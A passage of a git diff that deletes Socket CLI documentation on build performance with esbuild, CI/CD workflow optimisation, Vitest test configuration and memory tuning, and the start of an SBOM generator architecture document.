Maintenance Notes - -### When to Update These Patches - -1. **Eigen Hash**: Update if ONNX Runtime updates Eigen version in `deps.txt` -2. **BUILD_MLAS_NO_ONNXRUNTIME**: Can likely be removed once threading is confirmed stable -3. **wasm_post_build.js**: Keep indefinitely - harmless and ensures forward compatibility - -### How to Test Without Patches - -To verify if a patch is still needed: - -```bash -# Comment out the patch in scripts/build.mjs -# Then run: -node scripts/build.mjs --clean - -# If build succeeds without it, the patch may no longer be needed -# If build fails, the patch is still required -``` - -### Upstream Status - -- **Eigen Hash**: Reported but upstream unlikely to fix (GitLab issue, not ONNX issue) -- **BUILD_MLAS_NO_ONNXRUNTIME**: Fixed in newer versions with threading enabled -- **wasm_post_build.js**: Not reported (would need to add Emscripten version detection) - -## References - -- ONNX Runtime Build System: https://onnxruntime.ai/docs/build/web.html -- Emscripten Threading: https://emscripten.org/docs/porting/pthreads.html -- MLFloat16 Issue: https://github.com/microsoft/onnxruntime/issues/23769 diff --git a/docs/performance/performance-build.md b/docs/performance/performance-build.md deleted file mode 100644 index 47db6dcce..000000000 --- a/docs/performance/performance-build.md +++ /dev/null @@ -1,453 +0,0 @@ -# Build Performance Optimization - -## Overview - -Socket CLI uses esbuild for fast, reliable builds with optimal CLI startup performance. This document covers the build system architecture, optimizations, and available flags. - -## Why esbuild over Rollup - -### Single-pass compilation -- **Build time**: ~500ms typical (vs minutes with Rollup) -- **Hot reload**: Near-instant rebuilds in watch mode -- **Development velocity**: Faster iteration cycles - -### No template literal corruption -- esbuild preserves template literals correctly -- Rollup had historical issues with string interpolation -- Critical for CLI output formatting - -### Better for CLI startup time -- Optimized CommonJS output -- Minimal overhead in generated code -- Fast module initialization - -### Post-build Brotli compression -- Automatic `.bz` compressed artifacts -- Quality level 11 (maximum compression) -- Typical 70-80% size reduction -- Example: 11MB → 2.5MB compressed - -## Build Architecture - -``` -Entry point: src/cli-dispatch.mts - ↓ -esbuild bundler - ↓ -Optimizations: - ├─ Tree shaking (unused code removal) - ├─ Minification (optional, via --no-minify flag) - ├─ Local package resolution (monorepo support) - └─ Plugin system (custom resolvers) - ↓ -Output: dist/cli.js (executable CommonJS) - ↓ -Brotli compression - ↓ -Output: dist/cli.js.bz (compressed artifact) -``` - -## Build Optimizations - -### Minification -```javascript -// Default: minify disabled for readable stack traces -minify: false - -// Override for production builds: -SOCKET_CLI_NO_MINIFY=0 node scripts/build.mjs -``` - -### Tree-shaking -- Enabled by default -- Removes unused exports and code paths -- Significant bundle size reduction - -### Local package resolution -Resolves Socket monorepo packages during build: -- `@socketsecurity/lib` → Local `socket-lib` dist -- `@socketsecurity/sdk` → Local `socket-sdk-js` dist -- `@socketsecurity/registry` → Local `socket-registry/registry` dist -- `@socketregistry/packageurl-js` → Local `socket-packageurl-js` dist - -Benefits: -- No need to publish packages during development -- Instant reflection of local changes -- Consistent versioning across repos - -### Build analysis -```javascript -// esbuild config includes metafile generation -metafile: true - -// Outputs bundle size during build: -// ✓ Bundle size: 10.45 MB -``` - -## Build Flags - -### `--watch` -Development mode with automatic rebuilds: -```bash -pnpm run build:watch -# or -pnpm run dev -``` - -Features: -- Watches source files for changes -- Rebuilds on modification -- Near-instant incremental builds -- Preserves terminal output - -### `--no-minify` -Disable minification for debugging: -```bash -node scripts/build.mjs --no-minify -``` - -Use when: -- Debugging production issues -- Analyzing bundle contents -- Improving stack traces - -### `--quiet` -Suppress build progress output: -```bash -node scripts/build.mjs --quiet -``` - -### `--verbose` -Show detailed build information: -```bash -node scripts/build.mjs --verbose -``` - -### `--sea` -Build Single Executable Application binaries: -```bash -node scripts/build.mjs --sea -``` - -Delegates to `scripts/build-sea.mjs` for platform-specific executables. - -## Performance Characteristics - -### Build times - -``` -Cold build (clean): ~2-3 seconds - ├─ Clean dist: < 100ms - ├─ Extract WASM/models: ~1-2 seconds - └─ esbuild bundle: ~500ms - -Hot rebuild (watch mode): ~200-500ms - └─ esbuild incremental: ~200-500ms - -Full rebuild (with SEA): ~5-10 minutes - ├─ CLI build: ~2-3 seconds - └─ Platform binaries: ~5-10 minutes -``` - -### Bundle size - -``` -Uncompressed: ~11 MB - └─ Large due to bundled dependencies: - - ONNX runtime (~3MB) - - ML models (~2MB) - - Ink/React (~1MB) - - CLI dependencies (~5MB) - -Compressed (brotli): ~2.5 MB (77% reduction) - └─ Quality 11 (maximum) - └─ Used for distribution artifacts -``` - -### Startup time implications - -``` -Cold start: ~150-250ms - ├─ Node.js init: ~50ms - ├─ Module loading: ~50-100ms - └─ CLI init: ~50-100ms - -Warm start (cached): ~80-120ms - └─ Filesystem cache hit reduces module loading -``` - -Optimization impact: -- esbuild produces smaller output than Rollup -- CommonJS format loads faster than ESM in Node.js -- Single-file bundle reduces filesystem operations -- Tree-shaking removes ~30% unused code - -## Build Pipeline - -### Standard build -```bash -pnpm run build - -Steps: -1. Clean dist directory -2. Extract MiniLM model (ML inference) -3. Extract ONNX runtime (ML execution) -4. Extract Yoga WASM (layout engine) -5. Run esbuild bundle -6. Compress with brotli -``` - -### Watch mode -```bash -pnpm run build:watch - -Steps: -1-4. (same as standard build) -5. Run esbuild in watch mode - └─ Skips brotli compression - └─ Incremental rebuilds only -``` - -### Production build -```bash -INLINED_SOCKET_CLI_PUBLISHED_BUILD=1 pnpm run build - -Additional: -- Sets production environment flags -- Includes version hash -- Optimizes for distribution -``` - -## Build Artifacts - -``` -dist/ -├─ cli.js Primary executable (11MB) -├─ cli.js.bz Brotli compressed (2.5MB) -├─ npm-cli.js npm wrapper -├─ npx-cli.js npx wrapper -├─ pnpm-cli.js pnpm wrapper -└─ yarn-cli.js yarn wrapper -``` - -## Monorepo Integration - -### Package resolution order -``` -1. Local sibling directories: - ../../../socket-lib - ../../../socket-sdk-js - ../../../socket-registry/registry - ../../../socket-packageurl-js - -2. node_modules fallback: - node_modules/@socketsecurity/lib - node_modules/@socketsecurity/sdk - (etc.) - -3. Fail with clear error -``` - -### Custom plugins - -**resolve-socket-packages**: -- Resolves local Socket packages by path -- Handles subpath exports (e.g., `@socketsecurity/lib/logger`) -- Checks `package.json` exports field - -**resolve-socket-lib-internals**: -- Handles relative imports within socket-lib -- Maps `../constants/*` to dist paths -- Resolves bundled external dependencies - -**yoga-wasm-alias**: -- Redirects `yoga-layout` to custom sync implementation -- Required for Ink rendering in CLI - -**stub-problematic-packages**: -- Stubs `iconv-lite` and `encoding` -- Prevents bundling issues with optional dependencies - -## Troubleshooting - -### Build fails with "Cannot find module" - -Check local package paths: -```bash -ls -la ../../../socket-lib/dist -ls -la ../../../socket-sdk-js/dist -ls -la ../../../socket-registry/registry/dist -``` - -Rebuild dependencies: -```bash -cd ../../../socket-lib && pnpm run build -cd ../../../socket-sdk-js && pnpm run build -``` - -### Build succeeds but runtime errors - -Missing WASM/models: -```bash -# Re-extract assets -node packages/cli/scripts/extract-yoga-wasm.mjs -node packages/cli/scripts/extract-onnx-runtime.mjs -node packages/cli/scripts/extract-minilm-model.mjs -``` - -### Slow build times - -Use watch mode for development: -```bash -pnpm run dev -``` - -Clean node_modules if very slow: -```bash -pnpm run clean:node_modules -pnpm install -``` - -### Bundle size too large - -Check what's included: -```bash -# Build with analysis -node packages/cli/.config/esbuild.cli.build.mjs - -# Review metafile output -# Check for unexpected dependencies -``` - -## Best Practices - -### Development workflow -```bash -# 1. Start watch mode -pnpm run dev - -# 2. Make code changes -# 3. Test immediately (auto-rebuilt) -pnpm exec socket --version - -# 4. Iterate quickly -``` - -### Production workflow -```bash -# 1. Clean build -pnpm run build - -# 2. Run tests -pnpm test - -# 3. Verify bundle -ls -lh packages/cli/dist/cli.js - -# 4. Check startup time -time pnpm exec socket --version -``` - -### CI/CD workflow -```bash -# Build once, use everywhere -pnpm run build --quiet - -# Test with built artifacts -pnpm test-ci - -# Package for distribution -pnpm run build:platforms -``` - -## Comparison: esbuild vs Rollup - -| Feature | esbuild | Rollup | -|---------|---------|--------| -| Build time | ~500ms | ~30-60s | -| Watch mode | ~200ms | ~5-10s | -| Template literals | ✓ Correct | ⚠ Corruption issues | -| Tree shaking | ✓ Fast | ✓ Thorough | -| Minification | ✓ Built-in | Requires plugin | -| Plugin ecosystem | Growing | Mature | -| CLI startup impact | Fast | Slower | - -## Future Optimizations - -### Potential improvements -1. **Code splitting**: Split large dependencies into chunks -2. **Lazy loading**: Load ML models on demand -3. **Native modules**: Replace JS with native addons where beneficial -4. **Bundle analysis**: Automated size regression detection - -### Monitoring -```bash -# Track bundle size over time -du -h packages/cli/dist/cli.js - -# Compare startup time -hyperfine 'pnpm exec socket --version' - -# Profile cold starts -node --prof packages/cli/dist/cli.js --version -``` - -## Node.js Binary Optimizations - -Socket CLI also optimizes the underlying Node.js binary used for standalone distributions: - -### Binary Size Reduction -``` -Standard Node.js: 102MB (with debug symbols) -Optimized Binary: 35MB (66% smaller) - -Optimizations applied: -├─ V8 Lite Mode: -23MB (removes JIT tiers) -├─ ICU Removal: -8MB (no i18n support needed) -├─ SEA Removal: -2MB (we use yao-pkg instead) -└─ GNU Strip: -3MB (aggressive symbol removal) -``` - -### Build Performance -``` -Build System: Ninja (17% faster than Make) -Clean Build: 15-18 minutes -Incremental: 2-4 minutes - -Future optimizations: -├─ Parallel Brotli: 50-70% faster compression -├─ Compression cache: 80-90% faster rebuilds -└─ Resume checkpoint: Avoid full rebuilds on failure -``` - -### Runtime Performance -``` -Startup Time: No degradation (actually 8% faster) -JS Execution: 10-20% slower (acceptable for CLI) -WASM: No degradation (Liftoff intact) -I/O Operations: No degradation - -Real-world impact: <5% slower on CLI commands -Reason: CLI is I/O bound, not CPU bound -``` - -**See [../node-smol-builder/optimizations.md](../node-smol-builder/optimizations.md) for complete details.** - ---- - -## Summary - -Socket CLI's build system optimizes at two levels: - -**1. CLI Bundle (esbuild)** -- Sub-second builds for rapid development -- Tree-shaking and minification -- Brotli compression (77% size reduction) -- Fast startup times - -**2. Node.js Binary (smol-builder)** -- 66% smaller binaries (35MB vs 102MB) -- 17% faster builds with Ninja -- Negligible runtime impact for CLI workloads - -The combination delivers both fast development cycles and compact, performant distribution artifacts. diff --git a/docs/performance/performance-ci.md b/docs/performance/performance-ci.md deleted file mode 100644 index afee50af8..000000000 --- a/docs/performance/performance-ci.md +++ /dev/null @@ -1,406 +0,0 @@ -# CI/CD Performance Optimization - -Comprehensive guide to socket-cli's CI/CD pipeline optimization strategy and performance characteristics. - -## Workflow Architecture - -``` -CI Trigger (PR/Push) - │ - ├─ socket-cli/.github/workflows/ci.yml - │ └─ calls socket-registry/.github/workflows/ci.yml@ - │ │ - │ ├─ 🧹 Lint Check (parallel) - │ ├─ 🔍 Type Check (parallel) - │ └─ 🧪 Test Matrix (parallel) - │ ├─ Node 20 x Ubuntu - │ ├─ Node 20 x macOS - │ ├─ Node 20 x Windows - │ ├─ Node 22 x Ubuntu - │ ├─ Node 22 x macOS - │ ├─ Node 22 x Windows - │ ├─ Node 24 x Ubuntu - │ ├─ Node 24 x macOS - │ └─ Node 24 x Windows -``` - -## Reusable Workflow Strategy - -Socket-cli uses a centralized reusable workflow from socket-registry: - -```yaml -uses: SocketDev/socket-registry/.github/workflows/ci.yml@020ed8b2ef62abb750b083d7859ee3a221f88cf7 # main -``` - -**Benefits**: -- Single source of truth for CI configuration across Socket projects -- Centralized updates to CI logic benefit all projects -- Consistent behavior and optimization patterns -- Reduced maintenance burden per project - -**Pinned SHA Requirements**: -- GitHub Actions security best practice -- Ensures reproducible builds -- Prevents supply chain attacks via tag manipulation -- Update using: `cd socket-registry && git rev-parse main` - -## Matrix Testing Configuration - -```yaml -node-versions: '[20, 22, 24]' -os-versions: '["ubuntu-latest", "macos-latest", "windows-latest"]' -fail-fast: false -max-parallel: 4 -``` - -**Design Decisions**: -- `fail-fast: false` - All platform combinations must pass; no early exit -- Cross-platform testing ensures Windows + Unix compatibility -- Multiple Node versions validate compatibility range (18+) -- `max-parallel: 4` - Balance between speed and resource usage - -## CI-Specific Optimizations - -### 1. Early Bailout on Failures - -```javascript -// vitest.config.mts -bail: process.env.CI ? 1 : 0 -``` - -**Effect**: Exit immediately on first test failure in CI -**Benefit**: Faster feedback loop, saves compute time -**Local behavior**: Runs all tests for comprehensive debugging - -### 2. CI-Specific Scripts - -```json -{ - "lint-ci": "pnpm run lint", - "test-ci": "run-s test:*", - "type-ci": "pnpm run type" -} -``` - -**Why separate scripts**: -- No watch mode in CI (`--watch` flags removed) -- No interactive prompts or user input -- Consistent exit codes for CI integration -- Clear separation between dev and CI workflows -- Easy to add CI-specific flags (`--ci`, `--no-color`, etc.) - -**Standard pattern**: -``` -Development: pnpm run lint # May include --fix, --watch -CI: pnpm run lint-ci # Strict mode, no modifications -``` - -### 3. Test Parallelization - -```javascript -// vitest.config.mts -pool: 'threads', -poolOptions: { - threads: { - singleThread: false, - maxThreads: isCoverageEnabled ? 1 : 16, - minThreads: isCoverageEnabled ? 1 : 4, - isolate: false, - useAtomics: true - } -}, -sequence: { - concurrent: true -} -``` - -**Performance characteristics**: -- Multi-threaded execution (up to 16 threads) -- Worker isolation disabled for speed (`isolate: false`) -- Concurrent test execution within suites -- Atomic operations for thread synchronization - -**Trade-offs**: -- Speed over full isolation -- Requires proper test cleanup (beforeEach/afterEach) -- Mocking frameworks (nock, vi.mock) work correctly - -### 4. Build Caching Strategy - -```yaml -test-setup-script: 'cd packages/cli && pnpm run build' -``` - -**Caching layers**: -1. pnpm store cache (dependencies) -2. Node modules cache -3. Build artifacts (dist/) - -**Handled by setup-and-install action**: -- Automatic dependency caching by pnpm/action-setup -- Cache key based on pnpm-lock.yaml hash -- Separate caches per OS/Node version combination - -### 5. Dependency Installation - -```yaml -# Managed by SocketDev/socket-registry/.github/actions/setup-and-install -``` - -**Optimizations**: -- Frozen lockfile (`pnpm install --frozen-lockfile`) -- Shared pnpm store across workflow runs -- Parallel dependency fetching -- No postinstall scripts unless explicitly needed - -## Performance Metrics - -**Typical CI run times** (per platform): - -``` -Job Duration Notes -───────────────────────────────────────────────────── -Lint Check 1-2 min Biome + ESLint -Type Check 1-2 min TypeScript compilation -Test (Ubuntu) 3-5 min Fastest platform -Test (macOS) 4-6 min Medium performance -Test (Windows) 5-8 min Slowest platform -───────────────────────────────────────────────────── -Total (parallel) 5-8 min All checks running -Total (sequential) 20-30 min If run serially -``` - -**Time saved with optimizations**: -- Parallel execution: ~15-20 min saved vs sequential -- Build caching: ~1-2 min saved per job -- Early bailout: ~2-4 min saved on test failures -- Dependency caching: ~30-60 sec saved per job - -**Total optimization impact**: ~18-26 min saved per CI run - -## When CI Runs - -```yaml -on: - push: - branches: [main] - tags: ['*'] - paths: - - 'packages/cli/**' - - 'pnpm-lock.yaml' - - 'package.json' - - '.github/workflows/ci.yml' - pull_request: - branches: [main] - paths: - - 'packages/cli/**' - - 'pnpm-lock.yaml' - - 'package.json' - - '.github/workflows/ci.yml' - workflow_dispatch: -``` - -**Trigger conditions**: -- Pull requests to main branch -- Pushes to main branch -- Tag creation (releases) -- Manual dispatch (workflow_dispatch) -- Only when relevant files change (path filtering) - -**Path filtering benefits**: -- Skip CI for docs-only changes -- Reduce unnecessary builds -- Faster feedback on non-code changes - -## Debugging CI Failures - -### Reproduce Locally - -```bash -# Set CI environment -export CI=1 - -# Run exact CI commands -cd packages/cli -pnpm run build -pnpm run check -pnpm run type -pnpm run test:unit -``` - -**Environment differences to consider**: -```bash -CI=1 # Enables CI-specific behavior -NODE_ENV=test # May affect config loading -NO_COLOR=1 # Disables terminal colors -TERM=dumb # Non-interactive terminal -``` - -### Common Issues - -**Issue**: Tests pass locally, fail in CI -``` -Causes: - - Missing build step (pretest hook skipped in CI) - - Environment variable differences - - File path case sensitivity (macOS vs Linux) - - Timing issues with concurrent tests - -Solution: - 1. Run pnpm run build explicitly - 2. Check .env.test vs .env.local - 3. Use path.join() for cross-platform paths - 4. Add await or increase timeouts -``` - -**Issue**: Windows tests fail, Unix passes -``` -Causes: - - Hard-coded forward slashes in paths - - Line ending differences (CRLF vs LF) - - Case-sensitive imports - - Shell script incompatibilities - -Solution: - 1. Use path.join(), path.resolve() - 2. Configure Git: core.autocrlf=input - 3. Match exact casing in imports - 4. Use Node.js APIs instead of shell commands -``` - -**Issue**: Flaky test failures -``` -Causes: - - Race conditions in concurrent tests - - Shared state between tests - - External service dependencies - - Filesystem timing issues - -Solution: - 1. Add proper cleanup in afterEach - 2. Use unique temp directories per test - 3. Mock external dependencies (nock) - 4. Add fs.promises with await -``` - -### CI-Specific Debugging - -**Enable debug output**: -```yaml -workflow_dispatch: - inputs: - debug: '1' -``` - -**Check specific Node/OS combination**: -```yaml -workflow_dispatch: - inputs: - node-versions: '[22]' - os-versions: '["ubuntu-latest"]' -``` - -**Skip tests temporarily**: -```yaml -workflow_dispatch: - inputs: - skip-tests: true -``` - -### Environment Differences - -``` -Local Development CI Environment -────────────────────────────────────────────────── -Interactive terminal Non-interactive (TERM=dumb) -Color output enabled Colors disabled (NO_COLOR=1) -Watch mode available No watch mode -Build cache persistent Fresh build each run -Node modules cached Clean install -Git hooks active No Git hooks -.env.local loaded .env.test loaded -User-specific config No user config -``` - -## Optimization Best Practices - -### Test Organization - -```javascript -// Good - Fast tests -describe('validation', () => { - it('should validate input', () => { - expect(validate('test')).toBe(true) - }) -}) - -// Avoid - Slow tests -describe('validation', { timeout: 60_000 }, () => { - it('should validate with network call', async () => { - const result = await fetchAndValidate('test') - expect(result).toBe(true) - }) -}) -``` - -**Guidelines**: -- Unit tests should be fast (<100ms each) -- Mock external dependencies (filesystem, network, APIs) -- Use fixtures instead of generating data -- Avoid unnecessary async operations -- Group slow tests separately (e2e, integration) - -### Script Composition - -```json -{ - "test": "run-s check test:*", - "test:prepare": "pnpm build && del-cli 'test/**/node_modules'", - "test:unit": "vitest run", - "test:validate": "node scripts/validate-tests.mjs", - "test:wrapper": "node scripts/test-wrapper.mjs", - "test-ci": "run-s test:*" -} -``` - -**Pattern**: Break into atomic steps -- Each step can run independently -- Easy to debug individual failures -- Clear progress tracking -- Parallel execution possible (run-p vs run-s) - -### Caching Strategy - -**What to cache**: -- pnpm store (automatic via pnpm/action-setup) -- node_modules (automatic) -- Build artifacts (dist/) -- Type coverage results - -**What NOT to cache**: -- Test results (must run fresh) -- Temporary files -- Log output -- Coverage reports - -## Future Optimizations - -**Potential improvements**: -- Sharded test execution (split tests across jobs) -- Incremental type checking (only changed files) -- Build output caching between jobs -- Dynamic matrix based on changed files -- Turborepo for monorepo task caching - -**Blocked by**: -- Vitest sharding support maturity -- TypeScript incremental build complexity -- GitHub Actions artifact size limits -- Matrix job coordination overhead - -## Related Documentation - -- Build system: `/Users/jdalton/projects/socket-cli/docs/build-system-summary.md` -- Local testing: `/Users/jdalton/projects/socket-cli/docs/local-testing.md` -- Configuration: `/Users/jdalton/projects/socket-cli/docs/configuration-summary.md` -- Socket registry standards: `/Users/jdalton/projects/socket-registry/CLAUDE.md` diff --git a/docs/performance/performance-testing.md b/docs/performance/performance-testing.md deleted file mode 100644 index 6f5360eb1..000000000 --- a/docs/performance/performance-testing.md +++ /dev/null @@ -1,536 +0,0 @@ -# Performance Testing - -Comprehensive guide to socket-cli's test optimization strategies, including configuration, smart test selection, and memory management. - -## Vitest Configuration - -### Thread Pool - -```typescript -pool: 'threads', -poolOptions: { - threads: { - maxThreads: isCoverageEnabled ? 1 : 16, - minThreads: isCoverageEnabled ? 1 : 4, - isolate: false, - useAtomics: true, - } -} -``` - -**Thread allocation**: -- **Development**: 4-16 threads for fast parallel execution -- **Coverage mode**: Single thread for accurate V8 coverage collection -- **Worker threads**: Leverage multi-core CPUs effectively - -### `isolate: false` Tradeoff - -**Decision matrix**: -``` -isolate: true → Full isolation, slower, breaks nock/module mocking -isolate: false → Shared worker context, faster, mocking works -``` - -**Why `isolate: false`**: -1. Significant performance improvement (faster test runs) -2. Nock HTTP mocking works correctly across all test files -3. Vi.mock() module mocking functions properly -4. Test state pollution prevented through proper beforeEach/afterEach -5. Tests designed to clean up after themselves - -**Tests requiring isolation**: -- Use `{ pool: 'forks' }` in test file metadata -- Or use separate isolated config - -### Timeouts - -```typescript -testTimeout: 30_000 // 30 seconds -hookTimeout: 30_000 // 30 seconds -``` - -**Why 30 seconds**: -- CLI integration tests spawn processes -- Package manager operations (npm, pnpm, yarn) -- Network requests to Socket API -- SBOM generation with CDXgen -- File system operations in monorepo fixtures - -**Timeout flow**: -``` -Test starts → CLI spawns → Package manager runs → API calls → Assertions - (instant) (1-5s) (5-15s) (2-8s) (instant) - └─────────────── 30s maximum ─────────────────┘ -``` - -### Coverage Configuration - -```typescript -coverage: { - provider: 'v8', - reporter: ['text', 'json', 'html', 'lcov', 'clover'], - include: ['src/**/*.mts', 'src/**/*.ts'], - exclude: [ - '**/*.config.*', - '**/node_modules/**', - 'scripts/**', - 'test/**', - 'dist/**', - ], - all: true, -} -``` - -**Coverage modes**: -- **V8 provider**: Fast native coverage -- **Single thread**: Prevents race conditions -- **All files**: Reports uncovered code - -## Smart Test Selection - -### changed-test-mapper - -Maps source file changes to affected test files: - -```javascript -// Core files trigger full suite -CORE_FILES = [ - 'src/helpers.ts', - 'src/strings.ts', - 'src/constants.ts', - 'src/lang.ts', - 'src/error.ts', - 'src/validate.ts', -] - -// Specific mappings -src/package-url.ts → test/package-url.test.mts, test/integration.test.mts -src/result.ts → test/result.test.mts -test/*.test.mts → itself -``` - -**Decision tree**: -``` -File changed? - ├─ Core file → Run all tests - ├─ Config file → Run all tests - ├─ Test file → Run that test - ├─ Source file → Run mapped tests - └─ Data file → Run integration tests -``` - -### Using `--staged` Flag - -Run tests only for staged git changes: - -```bash -# Lint and test staged files -pnpm check --staged -pnpm lint --staged --fix - -# Stage specific changes, test them -git add src/package-url.ts -pnpm check --staged -``` - -**Flow**: -``` -git add file.ts → --staged flag → getStagedFiles() → map to tests → run subset -``` - -### Using `--changed` Flag - -Run tests for all uncommitted changes (default behavior): - -```bash -# Lint and test changed files -pnpm check -pnpm check --changed # explicit - -# Fix changed files -pnpm fix -``` - -**Flow**: -``` -Edit files → --changed flag → getChangedFiles() → map to tests → run subset -``` - -### Core Files Trigger Full Suite - -When changed, these files affect entire codebase: - -```javascript -CORE_FILES = [ - 'src/constants.ts', // Global constants - 'src/error.ts', // Error handling - 'src/helpers.ts', // Utility functions - 'src/lang.ts', // Language utilities - 'src/objects.ts', // Object utilities - 'src/strings.ts', // String utilities - 'src/validate.ts', // Validation logic -] - -CONFIG_PATTERNS = [ - '.config/**', // Build/lint configs - 'scripts/utils/**', // Script utilities - 'tsconfig*.json', // TypeScript config - 'eslint.config.*', // ESLint config -] -``` - -**Example**: -```bash -# Edit core file -vi src/helpers.ts - -# Triggers full suite -pnpm check -# ℹ Running all tests (core file changes) -``` - -## Test Execution Strategies - -### Development Workflow - -**Fast iteration**: -```bash -# Stage changes, run affected tests -git add src/package-url.ts -pnpm check --staged - -# Fix issues in staged files -pnpm lint --staged --fix -git add . - -# Run full check before commit -pnpm check -``` - -**Decision matrix**: -``` -Quick fix? - ├─ Yes → pnpm check --staged (fast, targeted) - └─ No → pnpm check (thorough, all affected) - -Before commit? - └─ Always → pnpm check (no flags, full safety) -``` - -### CI Execution - -**Always runs full suite**: -```javascript -if (process.env.CI === 'true') { - return { tests: 'all', reason: 'CI environment' } -} -``` - -**CI flow**: -``` -PR opened → CI detects → Runs all tests → Reports coverage → Status check -``` - -### Concurrent Execution - -```typescript -sequence: { - concurrent: true // Run tests concurrently within suites -} -``` - -**Parallelization**: -``` -Suite A: test1, test2, test3 → Thread pool -Suite B: test4, test5 → Thread pool } Parallel -Suite C: test6, test7, test8 → Thread pool -``` - -**Benefits**: -- Better thread utilization -- Faster suite completion -- Efficient multi-core usage - -### Early Bailout - -```typescript -bail: process.env.CI ? 1 : 0 -``` - -**Bailout strategy**: -``` -CI environment: - test1 ✓ → test2 ✓ → test3 ✗ → STOP (fast feedback) - -Local development: - test1 ✓ → test2 ✗ → test3 ✗ → Complete (see all failures) -``` - -## Memory Management - -### Memory Limits - -```javascript -NODE_OPTIONS: - `--max-old-space-size=${process.env.CI ? 8192 : 4096} --max-semi-space-size=512` -``` - -**Memory allocation**: -``` -Local: 4GB old space + 512MB semi space = ~4.5GB total -CI: 8GB old space + 512MB semi space = ~8.5GB total -``` - -**Why these limits**: -- CLI spawns subprocesses (npm, pnpm, yarn) -- RegExp-heavy tests (parsing, validation) -- SBOM generation loads large dependency trees -- Concurrent test execution multiplies memory - -### Memory Flow - -``` -Test suite starts - ├─ Vitest allocates workers (16 threads max) - ├─ Each test spawns CLI process - │ ├─ CLI spawns package manager - │ ├─ Package manager loads dependency graph - │ └─ CLI processes results - ├─ V8 GC runs (semi-space helps with short-lived objects) - └─ Workers cleaned up -``` - -### Worker Error Filtering - -```javascript -// Filter out worker termination noise -if (result.stderr) { - const filtered = result.stderr - .split('\n') - .filter(line => !line.includes('Worker unexpectedly exited')) - .join('\n') -} -``` - -**Why filter**: -- Worker pool terminates normally after tests -- "Unexpectedly exited" is expected behavior -- Reduces noise in test output -- Focuses on actual errors - -### Semi-Space Sizing - -``` ---max-semi-space-size=512 -``` - -**Purpose**: -- Young generation GC optimization -- Better performance for short-lived objects -- CLI tests create many temporary objects: - - Parsed command arguments - - Spawned process metadata - - RegExp match results - - Temporary file paths - -**GC flow**: -``` -Object created → Semi-space → Survives? → Old space - (512MB) No → GC collects (fast) - Yes → Promoted (kept) -``` - -## Isolated Tests - -### When to Use Isolated Config - -Use fork pool when tests: -- Mutate global state unsafely -- Require true process isolation -- Cannot share worker context -- Need independent module cache - -**Example scenarios**: -```javascript -// Needs isolation: mutates process.env extensively -describe('environment tests', { pool: 'forks' }, () => { - it('modifies NODE_ENV', () => { - process.env.NODE_ENV = 'production' - // Test logic - }) -}) - -// Does NOT need isolation: clean beforeEach/afterEach -describe('CLI tests', () => { - beforeEach(() => { - mockFs() - }) - afterEach(() => { - restoreFs() - }) -}) -``` - -### Fork Pool vs Thread Pool - -**Performance tradeoff**: -``` -Thread Pool (default): - ├─ Shared memory space - ├─ Fast worker creation - ├─ Efficient for most tests - └─ 10-30s typical suite time - -Fork Pool (isolated): - ├─ Separate process per worker - ├─ Slower worker creation - ├─ True isolation guarantee - └─ 2-5x slower than threads -``` - -**Configuration comparison**: -```typescript -// Standard config (fast) -pool: 'threads', -poolOptions: { - threads: { - isolate: false, - maxThreads: 16, - } -} - -// Isolated config (safe) -pool: 'forks', -poolOptions: { - forks: { - singleFork: true, - isolate: true, - } -} -``` - -### Migration Strategy - -``` -Evaluate test: - ├─ Modifies globals? → Use { pool: 'forks' } metadata - ├─ Cleans up properly? → Keep in thread pool - └─ Unsure? → Test both, compare results -``` - -## Best Practices - -### Quick Reference - -```bash -# Development -pnpm check --staged # Fast feedback on staged changes -pnpm check # Run affected tests -pnpm lint --staged --fix # Fix staged files - -# Before commit -pnpm check # Full check on changed files -pnpm test # Full test suite - -# Coverage -pnpm run cover # Generate coverage report - -# Specific tests -pnpm test test/result.test.mts # Single test file -pnpm test 'test/**/*-url*.test.mts' # Glob pattern -``` - -### Optimization Checklist - -Test performance optimization: -- ✓ Use `--staged` for quick iteration -- ✓ Clean up resources in afterEach -- ✓ Avoid unnecessary isolation -- ✓ Use concurrent execution -- ✓ Filter worker error noise -- ✓ Monitor memory usage -- ✓ Profile slow tests - -### Common Pitfalls - -**Memory leaks**: -```javascript -// Bad: resource leak -it('spawns CLI', async () => { - const child = spawn('socket', ['--help']) - // Test logic - // Missing: child.kill() -}) - -// Good: cleanup -it('spawns CLI', async () => { - const child = spawn('socket', ['--help']) - try { - // Test logic - } finally { - child.kill() - } -}) -``` - -**False isolation needs**: -```javascript -// Bad: unnecessary isolation -describe('parser tests', { pool: 'forks' }, () => { - it('parses URL', () => { - // Pure function, no state mutation - }) -}) - -// Good: thread pool sufficient -describe('parser tests', () => { - it('parses URL', () => { - // Pure function, safe in threads - }) -}) -``` - -**Timeout confusion**: -```bash -# Test times out, don't blindly increase -testTimeout: 60_000 # Bad reflex - -# Instead: investigate why slow -# - Unnecessary waits? -# - Network timeout issues? -# - Process not terminating? -``` - -## Performance Monitoring - -### Tracking Metrics - -Monitor test suite health: -``` -Metric Target Alert -Suite time < 45s > 60s -Memory peak < 4GB > 5GB -Thread utilization > 60% < 40% -Timeout failures 0 > 2 -``` - -### Profiling Tests - -```bash -# Time specific test -time pnpm test test/slow.test.mts - -# Profile memory -NODE_OPTIONS="--max-old-space-size=4096 --heap-prof" pnpm test - -# Vitest reporter -pnpm test --reporter=verbose -``` - -### Continuous Improvement - -``` -Measure → Identify bottlenecks → Optimize → Verify - ↑ ↓ - └──────────────── Monitor ←─────────────────┘ -``` diff --git a/docs/sbom-generator/architecture.md b/docs/sbom-generator/architecture.md deleted file mode 100644 index 0b138bc33..000000000 --- a/docs/sbom-generator/architecture.md +++ /dev/null @@ -1,396 +0,0 @@ -# SBOM Generator - Architecture & API Design - -## Core Philosophy - -**SBOM is the canonical format. CodeT5 format is a derived optimization.** - -### Pipeline Flow - -``` -┌─────────────┐ -│ Lockfiles │ -│ (50,000 │ -│ tokens) │ -└──────┬──────┘ - │ Parse - ▼ -┌─────────────┐ -│ SBOM │ ◄─── Canonical Format (CycloneDX v1.5) -│ (Standard) │ • Industry standard -│ (~50KB) │ • Interoperable -└──────┬──────┘ • Cacheable - │ Enrich - ▼ -┌─────────────┐ -│ Enriched │ ◄─── + Socket Security Data -│ SBOM │ • Vulnerability data -│ (~75KB) │ • Security scores -└──────┬──────┘ • Supply chain risks - │ Format - ▼ -┌─────────────┐ -│ CodeT5 │ ◄─── Optimized for ML -│ Format │ • 600x token reduction -│ (~300 │ • Task-specific -│ tokens) │ • Context-prioritized -└─────────────┘ -``` - -## Why 